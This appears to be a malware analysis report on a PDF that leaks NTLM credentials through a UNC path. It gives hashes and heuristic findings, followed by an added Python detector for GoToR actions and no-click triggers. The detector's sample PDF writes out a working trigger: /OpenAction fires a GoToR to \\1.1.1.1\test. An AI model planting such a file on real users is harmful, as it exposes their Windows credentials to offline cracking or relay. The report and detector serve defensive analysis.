Malicious PDF — malware analysis report

Static analysis result for SHA-256 915721c9e7e18f5f…

Verdict: MALICIOUS
Type: PDF
Size: 812 B
First seen: 2020-12-25
MD5: 9325f0e750240bffaf36aaef830ce59a
SHA-1: 78aefc378283737199b63e95af846a4d4d9a299f
SHA-256: 915721c9e7e18f5f3aa900f5f458f9a68fdac07580bc11e2157e9c8349bb2979
Risk score: 82

Machine Learning

  • Nyx PDF Classifier: clean score 0.1047

Heuristics (3)

  • UNC path in PDF: possible NTLM credential theft (CVE-2018-4993 / CVE-2019-7089) (severity: high, tag: CVE likely, id: CVE_2018_4993)
    The PDF contains a UNC path (\\server\share) next to an action trigger. When a vulnerable viewer resolves that path while processing the matching action (for example on document open, with no click required), the Windows SMB client authenticates to the remote host automatically and hands it the user's NTLM challenge-response, which the host can crack offline or relay. The leak only succeeds if outbound SMB (TCP 445) or the WebDAV fallback can reach the host, and patched viewers prompt before following a remote file target, so check both the egress path and the viewer version when triaging.
  • Remote GoTo action (severity: high, id: PDF_GOTO_REMOTE)
    The PDF references an external document through a GoToR (remote go-to) or GoToE (embedded go-to) action whose /F file specification is a URL, a UNC path or an executable rather than a local PDF.
  • Embedded URL (severity: info, id: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: \\1.1.1.1\test (channel: PDF document text)
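As an added worked example (my code, not the scanner's), the following byte-level Python detector reproduces the logic behind the three heuristics above: it decodes PDF literal strings (where the UNC path's backslashes are escaped), classifies the /F target of every GoToR/GoToE action, flags a UNC target that an /OpenAction or /AA trigger can reach without a click, and lists UNC paths and URLs together with the channel that reached them. The sample PDF it scans is constructed here to mirror this report's indicators; the function names and the finding labels it emits are my own choices.

```python
"""Byte-level detector for the GoToR/GoToE and UNC-plus-trigger heuristics listed above.
Added example, not the scanner's own code; the sample PDF below is constructed."""
import re

# Constructed sample: /OpenAction fires a GoToR whose /F is a UNC path (PDF literal strings escape backslashes, hence the doubling).
SAMPLE_PDF = rb"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >> endobj
4 0 obj << /Type /Action /S /GoToR /F (\\\\1.1.1.1\\test) /D [0 /Fit] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

OBJ_RE = re.compile(rb'(\d+)\s+\d+\s+obj\b(.*?)endobj', re.S)
ACTION_RE = re.compile(rb'/S\s*/(GoToR|GoToE)\b')
TRIGGER_RE = re.compile(rb'/(OpenAction|AA)\b')   # fires with no click: document open, page/annot events
URL_RE = re.compile(r'\\\\[^\\\s)]+\\[^\s)]*|//[^/\s)]+/[^\s)]*|[a-z][a-z0-9+.-]*://[^\s)]+', re.I)
_ESC = {b'n': b'\n', b'r': b'\r', b't': b'\t', b'b': b'\b', b'f': b'\f',
        b'(': b'(', b')': b')', b'\\': b'\\'}

def unescape_pdf_string(raw):
    """Decode a literal string body (ISO 32000-1 7.3.4.2): named escapes, 1-3 octal digits,
    backslash-EOL continuation; a backslash before any other byte is dropped."""
    out, i = bytearray(), 0
    while i < len(raw):
        nxt, octal = raw[i + 1:i + 2], re.match(rb'[0-7]{1,3}', raw[i + 1:i + 4])
        if raw[i:i + 1] != b'\\':
            out += raw[i:i + 1]
            i += 1
        elif nxt in _ESC:
            out += _ESC[nxt]
            i += 2
        elif octal:
            out.append(int(octal.group(), 8) & 0xFF)
            i += 1 + len(octal.group())
        else:
            i += 3 if raw[i + 1:i + 3] == b'\r\n' else 2 if nxt in (b'\r', b'\n') else 1
    return bytes(out)

def read_literal(data, start):
    """data[start] is '('; return (decoded string, index just past the matching ')')."""
    depth, i = 0, start
    while i < len(data):
        c = data[i:i + 1]
        if c == b'\\':
            i += 1                                 # skip the escaped byte, whatever it is
        elif c == b'(':
            depth += 1                             # balanced unescaped parens are legal inside
        elif c == b')' and (depth := depth - 1) == 0:
            return unescape_pdf_string(data[start + 1:i]), i + 1
        i += 1
    raise ValueError('unterminated literal string')

def classify_target(target):
    """'unc' (Windows form or the //server/share form of PDF file specs), 'url', 'executable', else None."""
    t = target.decode('latin-1')
    if t.startswith('\\\\') or re.match(r'//[^/]+/', t):
        return 'unc'
    if re.match(r'[a-z][a-z0-9+.-]*://', t, re.I):
        return 'url'
    return 'executable' if t.lower().rsplit('.', 1)[-1] in ('exe', 'bat', 'cmd', 'scr', 'vbs', 'ps1') else None

def scan_pdf(data):
    """Heuristic hits for one PDF, labelled as in the report above."""
    hits, objects = [], {int(m.group(1)): m.group(2) for m in OBJ_RE.finditer(data)}
    has_trigger = TRIGGER_RE.search(data) is not None
    for num, body in objects.items():
        am = ACTION_RE.search(body)
        if not am:
            continue
        ref = re.search(rb'/F\s+(\d+)\s+\d+\s+R\b', body)   # /F may point at a file-spec object
        spec = objects.get(int(ref.group(1)), body) if ref else body
        fm = re.search(rb'/(UF|F)\s*\(', spec)             # hex strings, object streams: not handled
        target = read_literal(spec, fm.end() - 1)[0] if fm else b''
        kind = classify_target(target)
        if kind is None:
            continue                                       # GoToR to a local file is not a hit
        hit = {'id': 'PDF_GOTO_REMOTE', 'object': num, 'action': am.group(1).decode(),
               'target': target.decode('latin-1'), 'target_kind': kind}
        hits.append(hit)
        if kind == 'unc' and has_trigger:                  # UNC reachable without a click: NTLM-leak pattern
            hits.append(dict(hit, id='CVE_2018_4993'))
    return hits

def extract_urls(data):
    """EMBEDDED_URL-style listing: each UNC path or URL in a literal string, with its channel."""
    found = []
    for m in OBJ_RE.finditer(data):
        body, i = m.group(2), 0
        channel = 'action file spec' if ACTION_RE.search(body) else 'document text'
        while (i := body.find(b'(', i)) != -1:             # walk every literal string in the object
            try:
                s, i = read_literal(body, i)
            except ValueError:
                break                                      # '(' inside binary stream data: give up
            found += [(u, channel) for u in URL_RE.findall(s.decode('latin-1'))]
    return found
```

Running scan_pdf(SAMPLE_PDF) yields a PDF_GOTO_REMOTE hit for object 4 with target \\1.1.1.1\test and target_kind 'unc', followed by the CVE_2018_4993 hit because /OpenAction makes the path reachable on open; extract_urls(SAMPLE_PDF) returns that same path labelled with its channel. The scanner works on the raw byte stream only: objects packed into FlateDecode object streams, hex-string (<...>) file specifications and XFA templates (the CVE-2019-7089 vector) would need to be decompressed or parsed first, which is exactly where a production heuristic engine spends most of its effort.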